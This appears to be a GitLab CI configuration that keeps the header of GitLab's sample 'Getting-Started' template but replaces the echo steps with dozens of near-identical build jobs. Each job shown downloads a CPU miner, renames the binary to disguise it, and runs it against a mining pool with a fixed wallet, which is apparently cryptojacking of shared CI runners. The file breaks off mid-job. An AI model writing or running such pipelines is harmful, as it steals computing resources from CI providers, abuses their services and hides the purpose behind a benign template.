# This file is a template, and might need editing before it works on your project.
# To contribute improvements to CI/CD templates, please follow the Development guide at:
# https://docs.gitlab.com/ee/development/cicd/templates.html
# This specific template is located at:
# https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Getting-Started.gitlab-ci.yml

# This is a sample GitLab CI/CD configuration file that should run without any modifications.
# It demonstrates a basic 3 stage CI/CD pipeline. Instead of real tests or scripts,
# it uses echo commands to simulate the pipeline execution.
#
# A pipeline is composed of independent jobs that run scripts, grouped into stages.
# Stages run in sequential order, but jobs within stages run in parallel.
#
# For more information, see: https://docs.gitlab.com/ee/ci/yaml/index.html#stages

image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 tete
     - ./tete -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_b:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 tete
     - ./tete -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_c:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 tetex
     - ./tetex -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_d:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 ter
     - ./ter -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_e:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 kontol
     - ./kontol -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_f:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 babai
     - ./babai -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_g:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 wadi
     - ./wadi -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_h:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 memeq
     - ./memeq -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_i:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 asem
     - ./asem -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_j:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 qwintol
     - ./qwintol -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_k:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_l:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_m:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_n:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_o:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_p:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_q:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_r:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_s:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js


build_u:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_v:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js 

build_w:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_x:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_y:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_z:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ab:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ac:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ad:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ae:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_af:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ag:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ah:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ai:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_aj:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ak:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_al:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_am:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_an:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ao:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_av:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_aw:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ax:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ay:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_az:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_aaa:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_aab:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_aac:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_aad:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_aae:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js
build_1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_7:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_8:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_10:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_11:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_12:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_13:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_14:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_15:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_16:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_17:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_18:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_19:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_20:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_21:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_22:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_23:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_24:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_25:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ljhm1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2lhnm:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
